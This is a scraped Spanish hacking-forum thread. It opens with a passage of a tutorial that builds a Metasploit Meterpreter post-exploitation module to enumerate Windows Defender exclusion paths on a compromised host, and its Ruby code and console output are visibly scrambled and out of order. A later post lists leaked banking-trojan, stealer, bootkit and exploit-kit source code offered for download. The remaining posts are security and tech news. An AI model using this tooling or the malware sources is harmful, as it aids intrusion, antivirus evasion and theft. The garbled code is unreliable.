Msf::Post::Windows::Registry#methods:

registry_createkey  registry_deleteval  registry_enumvals    registry_getvalinfo  registry_setvaldata


registry_deletekey  registry_enumkeys   registry_getvaldata  registry_loadkey     registry_unloadkey


Podemos identificar el método registry_enumkeys como el método que nos ayudaría a conseguir los keys debajo de otro, podemos ver el código del mismo y los valores que acepta usando el comando de show-source y dandole el nombre del método:



Código: php
>> show-source registry_enumkeys


From: /usr/local/share/metasploit-framework/lib/msf/core/post/windows/registry.rb @ line 94:

Owner: Msf::Post::Windows::Registry
Visibility: public
Number of lines: 7


meterpreter_registry_enumkeys(key, view)

def registry_enumkeys(key, view = REGISTRY_VIEW_NATIVE)
  if session_has_registry_ext
  else

end

shell_registry_enumkeys(key, view)

end


Podemos ver que requiere una valor que seria la llave que vamos a enumerar y el otro es una constante ya dada que tiene que ver con si queremos ver solo el valor de la llave en contexto x64, x86 o la visión nativa del proceso bajo el cual estamos corriendo, en el caso que esté corriendo en una maquina X64 y la versión de Meterpreter que estamos usando es x86 necesitamos especificar que es el contexto de x64 el que queremos, si no el contexto nativo es suficiente. Para ver la información de la arquitectura del sistema podemos ver la variable sysinfo que se auto genera en una sesión meterpreter la cual incluye la información:



Código: php
>> sysinfo


=> {"Computer"=>"WIN-RB3R8HILN3R",


"OS"=>"Windows 10 (Build 10240).",


"Architecture"=>"x64 (Current Process is WOW64)",

"System Language"=>"en_GB",

"Logged On Users"=>2}


"Domain"=>"WORKGROUP",


Probemos enumerando la llave que contiene la excepciones de Windows Defender que es HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions y ver que valores nos devuelve:



Código: php
>> registry_enumkeys("HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions", REGISTRY_VIEW_64_BIT)


=> ["Extensions", "Paths", "Processes", "TemporaryPaths"]



Podemos ver que nos devuelve un array con los nombres de las llaves. Podemos editar nuestro modulo desde dentro del mismo pry si deseamos. Guardemos el array que recibimos de tipos de exclusión en una variable de manera de poder entonces enumerar cada uno de ellos.



Código: php
>> exclusion_key = "HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions"

=> "HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions"

=> ["Extensions", "Paths", "Processes", "TemporaryPaths"]


>> exception_types = registry_enumkeys(exclusion_key,REGISTRY_VIEW_64_BIT)


Ahora podemos probar cata tipo de excepción y ver si tenemos alguna configurada.

Código: php
>> exception_types.each do |et|


|   puts registry_enumvals("#{exclusion_key}\\#{et}",REGISTRY_VIEW_64_BIT)

| end
C:\Users\Carlos Perez\Desktop\test_code
\\192.168.1.2\media

=> ["Extensions", "Paths", "Processes", "TemporaryPaths"]


Podemos ver que podemos enumerar las que están configuradas de tipo path. Ahora que tenemos toda la información que necesitamos y que confirmamos podemos salir de pry escribiendo el comando de exit. Una vez fuera podemos escribir edit en msfconsole


Código: php
>> exit


msf post(get_windefender_exclusions) > edit


Podemos ahora terminar de añadir toda la lógica necesaria para terminal el módulo.



Código: php
##


# This module requires Metasploit: http://metasploit.com/download

# Current source: https://github.com/rapid7/metasploit-framework

require 'msf/core/auxiliary/report'

##

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Post

include Msf::Auxiliary::Report

include Msf::Post::Windows::Registry

  def initialize(info={})

'Name'          => 'Windows enumerate Windows Defender exclusions.',

super( update_info( info,
      'Description'   => %q{

'License'       => BSD_LICENSE,

Windows enumerate Windows Defender exclusions.
      },

'Author'        => [ 'Carlos Perez ' ],


'Platform'      => [ 'win' ],


'SessionTypes'  => [ 'meterpreter' ]

))
  end

  def run()

print_status("Running post module against #{sysinfo['Computer']}")

print_status("Enumerating Windows Defender exceptions:")

if sysinfo['Architecture'] =~ /x64/

exclusion_key = "HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions"

exception_types = registry_enumkeys(exclusion_key)

exception_types = registry_enumkeys(exclusion_key,REGISTRY_VIEW_64_BIT)
    else
    end
    exception_types.each do |et|

exclusions = registry_enumvals("#{exclusion_key}\\#{et}",REGISTRY_VIEW_64_BIT)

vprint_status("Checking for #{et} exceptions.")
      if sysinfo['Architecture'] =~ /x64/
      else
        exclusions = registry_enumvals("#{exclusion_key}\\#{et}")

vprint_status("No exclusions found for #{et}")

end

      if exclusions.length > 0
        print_status("Exceptions found for #{et}")
        exclusions.each do |exc|
          print_good("\t#{exc}")
        end
      else

end

end
    end


end



Una vez salimos del editor msfconsole vuelve a cargar el módulo y podemos ahora probar los cambios.



Código: php
msf post(get_windefender_exclusions) > edit


[*] Launching /usr/bin/vim /Users/carlos/modulos/post/windows/gather/get_windefender_exclusions.rb

msf post(get_windefender_exclusions) > reload
[*] Reloading module...

[*] Enumerating Windows Defender exceptions:

msf post(get_windefender_exclusions) > run

[*] Running post module against WIN-RB3R8HILN3R

[*] Post module execution completed

[*] Exceptions found for Paths
[+]  C:\Users\Carlos Perez\Desktop\test_code
[+]  \\192.168.1.2\media

msf post(get_windefender_exclusions) >


En resumen, hemos visto como Pry nos puede ayudar a poder visualizar  mejor las llamadas del API, probar las mismas y a su vez reducir el tiempo cuando escribimos un módulo. Los mismos conceptos nos pueden servir cuando estamos tratando de resolver problemas con módulos existentes probando cada uno de sus componentes.



FUENTE| SBD
#34


Los comercios enviaban los objetos sin percatarse del engaño hasta que el ingeniero hacía en el balance de cuentas. Luego cambiaba los productos por cocaína.

Agentes de la Policía Nacional han detenido a un ingeniero informático por estafar a varias empresas españolas mediante la compra fraudulenta de productos por internet imitando comunicaciones bancarias, ha informado la Jefatura Superior de Policía de Madrid. El detenido, de 30 años y nacionalidad italiana, había desarrollado un programa informático que le permitía suplantar la comunicación entre la entidad bancaria y el comercio confirmando el pago de los productos sin que realmente éste se hubiese producido.

Es decir, el detenido reemplazaba la confirmación del cobro que recibe la página web por parte del banco y que es lo que permite finalizar la operación de compra y que se proceda al envío de la mercancía. La mayoría de los comercios no se percataban del fraude hasta tiempo después cuando realizaban un balance de cuentas y comprobaban que el desembolso nunca se había producido. Por el momento la cuantía de lo defraudado asciende a un total de 11.849 euros y se le imputan al menos ocho delitos de estafa.

El detenido adquiría teléfonos móviles, equipos informáticos, televisores u otros productos electrónicos, artículos de farmacia o muebles, muchos de los cuales fueron hallados durante el registro practicado en su domicilio.

Los establecimientos comerciales al recibir la notificación de cobro por parte del banco no dudaban en realizar el envío con los objetos supuestamente adquiridos. Además, el hecho de remitir los productos acompañados de la factura original de compra generaba una apariencia de legalidad que favorecía su posterior venta a terceros, logrando el detenido con ello gran beneficio económico.

Intercambio de cocaína

La investigación iniciada a raíz de la denuncia interpuesta por una empresa con sede en Pamplona, llevó a los agentes a la localización del detenido en las inmediaciones de su domicilio en el distrito de Usera-Villaverde. En el registro llevado a cabo en su vivienda los agentes incautaron números objetos, la mayoría aparatos electrónicos de gran valor, que coincidían con los denunciados por los propietarios de los establecimientos que habían sido víctimas de esta estafa informática. El arrestado se encontraba realizando la mudanza de la vivienda que ocupaba ya que su intención era regresar a Italia al sospechar que podía estar siendo investigado por las autoridades españolas.

Como consecuencia de esta operación, los agentes descubrieron que el detenido también canjeaba muchos de estos objetos a cambio de cocaína, intercambio que siempre realizaba con la misma persona y en normalmente en el mismo lugar, un bar situado en el distrito Centro.

A raíz de estas informaciones, los agentes establecieron un dispositivo en donde se procedió a la detención de tres personas, un varón y dos mujeres, por un delito contra la salud públicA y un delito contra el patrimonio.

En el registro del domicilio de los tres detenidos se halló más de un kilogramo de cocaína, medio kilogramo de sustancia de corte y diversos útiles para la distribución de esta sustancia estupefaciente. Además, los agentes intervinieron un arma corta en perfecto estado de funcionamiento y ocho cartuchos.

La investigación, que continúa abierta y en la que no se descarta la aparición de más víctimas, ha sido llevada a cabo por agentes de la de la Comisaría de distrito de Usera- Villaverde, pertenecientes a la Jefatura Superior de Policía de Madrid.



FUENTE| No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#35


"Adult Player", la APP que extorsiona a los usuarios que acceden a ver porno fotografiándoles
Una supuesta aplicación de pornografía servía a sus propietarios para chantajear a los usuarios que se la descargaban, según la empresa de seguridad Zscaler.

"Adult Player", nombre de la aplicación, tomaba de forma secreta imágenes de los propietarios de los terminales, antes de bloquearlos y exigir un "rescate" por él. La app activaba la cámara frontal del teléfono para tomar fotografías de quien utiliza la aplicación, Este tipo de aplicaciones son conocidas como "ransomwares", y exigen dinero a los usuarios con la amenaza de publicar información privada o de borrar el contenido del móvil.

CitarSolicitaba entre 300 y 500 € para "liberar" el móvil



FUENTE: 20 minutos
#36


Windows 10, el nuevo sistema operativo de Microsoft lanzado esta semana, ha generado preocupación entre los expertos de seguridad y usuarios al descubrir que sus configuraciones de privacidad son invasivas por omisión. Afortunadamente, no todo está perdido: especialistas cuentan qué pasos hay que seguir para protegerse de estas políticas.

Inmediatamente después de la instalación del nuevo sistema operativo en el ordenador, se puede desactivar la mayoría de las configuraciones predeterminadas invasivas, publica el blog Rock Paper Shotgun.

De tal modo, si usted no desea entregar sus datos personales a bases de datos corporativas de Microsoft 'voluntariamente', debe seguir los siguientes pasos.

Desactivar en Privacidad todo lo que parece poco fiable

Si usted entra en la opción Configuraciones y luego hace clic en Privacidad, encuentra 13 pantallas diferentes. El medio señala que la mayoría de los ajustes necesarios se ubican en la pestaña General, aunque otras también son importantes. Por ejemplo, el ajuste de los tipos de datos a los que cada aplicación en el sistema puede acceder.

Desactivar Cortana, el asistente de voz

El asistente impulsado por voz Cortana, un análogo de Siri, ya ha sido altamente elogiado como una de las mejores funciones de Windows 10. Sin embargo, su buen funcionamiento se debe a que anota las búsquedas anteriores del usuario y así puede proporcionar sugerencias y resultados de búsqueda más personalizados. En ese sentido, los usuarios tendrán que decidir si están dispuestos a desactivar Cortana a cambio del aumento de la privacidad.

Desactivar la publicidad personalizada

La publicidad personalizada obviamente se basa en almacenar algunos de sus datos personales para ofrecerle las compras más apropiadas. Para evitar que Windows 10 lo bombardee con anuncios dirigidos, hay que ir a un sitio web externo y desactivar las dos opciones relacionadas con la publicidad personalizada.

Usar una cuenta de Windows local

Por último, el blog recomienda eliminar su cuenta de Microsoft desde Windows 10 completamente y utilizar en su lugar una cuenta local recién registrada. Esto impide que Microsoft obtenga y use sus datos para asegurarse de que el ordenador está actualizado cuando se inicia la sesión. Es una característica es útil, pero si usted está preocupado por la recolección de datos que involucra, sólo necesita realizar este simple paso.


FUENTE| rt
#37
Os dejo una lista de utilidades que saqué por la red:

Dexter v2 (Point of Sales Trojan)
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Rovnix (Bootkit)
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Carberp (Banking Trojan)
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Tinba (Tiny ASM Banking Trojan)
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Zeus (Banking Trojan)
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

KINS (Banking Trojan)
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Dendroid (Android Trojan)
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Grum (Spam Bot)
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Pony 2.0 (Stealer)
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Alina Spark (Point of Sales Trojan)
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

RIG Front-end (Exploit Kit)
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



FUENTE| No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#38




En nuestra vida cotidiana hay tanta concentración de softwares de todo tipo que ya no notamos su existencia. Sin embargo, existe un conjunto de programas, sistemas operativos y estándares informáticos que pueden empujar el mundo al borde de un colapso operativo si se cuelgan.

El columnista del portal tecnológico No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, Iñaki De la Torre Calvo, hizo una selección de los 11 softwares dominantes. Se trata de programas "masivos y de uso diario, los que nos afectan a todos independientemente de nuestras necesidades y nuestra profesión", precisa.

Googlebot


Googlebot es un programa que entra en cada página web a preguntar qué hay dentro, cuándo se ha actualizado y demás detalles para que luego todo quede indexado en los servidores. Luego una búsqueda ofrecerá la lista de lo que el robot encontró.

SAP

SAP es un software para empresas que gestiona el pago de los sueldos, concede las vacaciones y controla turnos de trabajo y material de oficina. Todo eso, a la vez. Hoy en día lo utilizan una cuarta parte de las compañías de todo el mundo.

ATM

La llamada Gestión del Tránsito Aéreo (ATM, por sus siglas en inglés) es un término que comprende todos los sistemas que asisten un avión durante su viaje: el control del tráfico aéreo (ATC), la meteorología aeronáutica, los sistemas de navegación aérea, la gestión del flujo del tráfico aéreo y otros. Los controles del tráfico aéreo los desarrolla cada país independientemente basándose en requisitos propios. Pero si en un país falla el programa para coordinar y ordenar el espacio aéreo nacional, se queda en tierra no solo todo ese país, sino también una gran parte del extranjero, ya que los aviones de otros Estados no podrán transitar ese espacio aéreo.


Apache


El Apache es un estándar que hace posible navegar por la mayoría de los servidores (o por las webs que están en ellos): permite, por ejemplo, que un servidor Windows sea capaz de intercambiar información con otro Unix (que hablan diferentes 'idiomas'). Desde 1996, Apache es el servidor HTTP más extendido. Alcanzó su máxima cuota de mercado en 2005, cuando respaldó el 70% de los sitios web del mundo. Sin embargo ha sufrido un descenso en su cuota de mercado en los últimos años y hoy en día sirve a un 57% de todos los sitios web activos.
WordPress

WordPress es un sistema de gestión de contenidos (CMS, por sus siglas en inglés) enfocado al diseño, programación y actualización de cualquier tipo de página web, aunque ha alcanzado una gran relevancia como creador de blogs. Si los cambios de programación de este sistema tienen errores, un 20% de los sitios del mundo estará en apuros.


Windows


El 80% de los ordenadores de escritorio del mundo funciona con alguna de las varias versiones de Windows. Pero esto no es todo. Windows vende sistemas operativos para servidores de empresas e instituciones, que están en un tercio de todas las máquinas del mundo.
Android

En caso de fallar Android, el sistema operativo creado por Google, casi el 80% de los propietarios de los teléfonos móviles del mundo y un 62% de usuarios de tabletas dirían adiós a sus dispositivos.
Photoshop

A pesar de la existencia de alternativas gratuitas como Gimp, todas las publicaciones del mundo y los fotógrafos profesionales ya no consideran otro programa de edición y retoque digital de fotos que no sea Photoshop, que acaba de cumplir un cuarto del siglo en el mercado internacional.

Pro Tools

Pro Tools es el 'Photoshop' del sonido. La mayoría de los discos, las sintonías de programas de radio y televisión, las mezclas de diálogos y músicas de series, películas y obras de teatro, las locuciones de estaciones de trenes y aeropuertos están acabadas con este gigante de edición y mezcla de sonido.


Final Cut Pro


Final Cut Pro es un software de edición de vídeo no lineal que permite montar secuencias y sonido y añadir efectos y rótulos. Si se viene abajo, colapsa la mayoría de las cadenas de televisión del mundo.

IBAN

El Código Internacional de Cuenta Bancaria (IBAN, por sus siglas en inglés) es un código alfanumérico que identifica una cuenta bancaria determinada en una entidad financiera en cualquier lugar del mundo. Es decir, a cada cuenta le corresponde un único IBAN, mediante el cual se identifica el país, la entidad, la oficina y la cuenta. En 66 países del mundo (según los últimos datos accesibles), cualquier tarjeta de crédito o débito y las operaciones de una cuenta bancaria funcionan preguntándose estos datos continuamente, así que mejor que nada falle.



FUENTE| rt
#39
Cómo conseguir Windows 10 gratis y legal, aunque tu copia de Windows actual sea pirata.


Tal y como se confirmaba hace poco, todos y cada uno de nosotros ya podremos disponer de una copia legal del nuevo Windows 10, tengamos o no un Windows registrado en la actualidad, a continuación os mostraremos los pasos a seguir para poder conseguirlo y de ese modo todos aquellos que queráis dar el paso adelante y haceros con un Windows 10 legal, podáis llevarlo a cabo.

Ya ha quedado claro desde hace tiempo que todos aquellos usuarios que dispongan de un Windows 7, Windows 8 y  registrado y legal, podrán actualizarse de manera gratuita a a Windows 10, algo que para aquellos que tengan una copia pirata de alguno de estos sistemas mencionados no será posible de manera automática, aunque sí llevando a cabo una serie de pasos que os describiremos a continuación. En términos generales el proceso que vamos a llevar a cabo consiste en instalar, siempre antes del próximo 20 de julio, la Technical Preview del nuevo Windows 10.

Para ello resulta imprescindible ser usuario registrado de Windows Insider, ¿cómo lo logramos?, muy sencillo. En primer lugar nos dirigimos a esta página donde veremos las ventajas que nos ofrece Microsoft por ser miembro de Windows Insider y las novedades del nuevo sistema operativo. A continuación pulsamos sobre el enlace "Iniciar sesión" y ya que es la primera vez que accedemos, para comenzar el registro pinchamos sobre "Sign up now" situado en la parte inferior de la pantalla e introducir todos los datos personales que no vayan solicitando.




Antes de descargar la versión Insider Preview de Windows 10, la propia Microsoft recomienda que echéis un vistazo a los requisitos mínimos para su correcto funcionamiento, algo que podréis consultar aquí, aunque resumiendo se pide tener un procesador de 1 GHz o superior, 1 Gbytes. de RAM para la versión de 32 bits o 2 Gbytes. para la de 64 bits, 16 Gbytes. de espacio en disco, DirectX 9 con driver WDDM y conexión a Internet.

Pues bien, continuemos, una vez hecho el registro en Windows Insider aceptando los términos de uso y la declaración de privacidad, recibiremos un correo de bienvenida en la cuenta registrada. Ya estamos preparados para comenzar la descarga de Windows 10 Technical Preview, aunque antes de eso Microsoft recomienda que lo instalemos en una máquina secundaria, y si no disponemos de una, al menos utilizar una máquina virtual en nuestro equipo. De este modo no arriesgamos el correcto funcionamiento de nuestro PC.

CitarAviso: Sólo podrán actualizar a Windows 10 versión final vía OTA los suscritos a Windows Insider con una MSA -Microsoft Account-, y no necesitarán introducirla de nuevo cuando llegue la actualización el 29 de julio.


Para comenzar la descarga de la correspondiente ISO no tendremos más que introducir nuestra dirección de correo y contraseña en la página anteriormente referida y pulsar sobre "Set Up PC" para acceder a la página de descargas. En ella observamos un listado con todas las ISO que podemos descargar de Windows 10 Technical Preview, por lo que no tendremos más que elegir la que corresponde a nuestro idioma y si tenemos procesador de 32 o 64 bits.

Mientras se descarga, algo que llevará un rato dependiendo de la conexión que tengas, ya que el fichero «pesa» 3 Gbytes. en su versión de 32 bits y 4 Gbytes. en la de 64 bits, toma nota de la Clave de Producto, ya que será imprescindible introducirla más adelante durante el proceso de instalación. Una vez finalizada la descarga, debes descomprimir el fichero ISO en un DVD grabable o una memoria USB. Esto se puede llevar a cabo por medio de programas específicos para ello. Existen muchos programas gratuitos que lo hacen como Jihosoft Free ISO Maker, All Free ISO Creator, Active ISO Burner o la herramienta Windows 7 USB/DVD Download Tool de la propia Microsoft.

En estas herramientas lo que tenemos que hacer es simplemente seleccionar el fichero ISO que acabamos de descargar y creará las carpetas correspondientes al mismo en un DVD grabable o una memoria USB, lo que prefiramos.




Para terminar no tendremos más que empezar el proceso de instalación como cualquier otro sistema operativo siguiendo las instrucciones que vayan apareciendo en pantalla y utilizando la Clave de Producto que apuntamos anteriormente. Más delante, en concreto el próximo 29 de julio, ya recibiremos la versión final como actualización regular, totalmente gratis y con licencia oficial. De este modo ya tendremos nuestra copia como completamente legal de Windows 10 aunque no dispusiésemos anteriormente de un Windows legal instalado en nuestro equipo.

No queremos ser pesados, pero os recomendamos, tal y como ya hemos dicho, que instaléis esta copia de Windows 10 en otro ordenador de no sea el habitual, o por el contrario utilizad una máquina virtual, o como último recurso, al menos generar una copia de seguridad de todos vuestros datos antes de comenzar a instalar el nuevo sistema.



FUENTE| adslzone
#40
Si eres usuario de la aplicación de iOS para gestionar el correo electrónico, Mail, esto te interesa. El investigador de seguridad Jan Soucek ha publicado en GitHub una peligrosa vulnerabilidad que afecta a esta app nativa de Apple.

El experto creó un código que funciona con iOS 8.3 y se aprovecha de un fallo en la app Mail. Si un atacante envía un correo a un usuario que usa esta herramienta de email, aparece un pop-up en la pantalla que solicita la contraseña de iCloud.

El pop-up es falso, pero parece totalmente auténtico. Un claro ejemplo de phishing e ingeniería social. Pero, ¿qué ocurre si introduces tu contraseña? Que se la estarías enviando al atacante, que tendrá todo lo que necesita para acceder a tu cuenta de iCloud.

Al parecer el experto en seguridad descubrió el bug en enero, cuando lo notificó a la compañía. Pero esta por el momento, no ha solucionado el fallo, por eso Soucek decidió publicarlo.




Según explica el investigador, el fallo permite inyectar contenido HTML remoto, reemplazando el contenido original del correo. De esta forma, se puede crear una herramienta para obtener las contraseñas con un simple HTML y CSS.

Soucek ha creado un vídeo en el que explica y realiza una demostración de este fallo de seguridad:


[/youtube]


No caigas en la trampa

Como consejo: si recibes un email en alguno de tus dispositivos de Apple (Mac, iPhone o iPad) que contiene un enlace que solicita una contraseña, ciérralo, sin introducir por supuesto ningún dato.

¿Si ya lo has introducido? Modifica lo antes posible la contraseña de acceso a la cuenta y las de los servicios que usaran la misma credencial. Recuerda que no deberías reutilizar las contraseñas, un hábito que podría acarrearte problemas.


LINK CODE: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

FUENTE| globbsecurity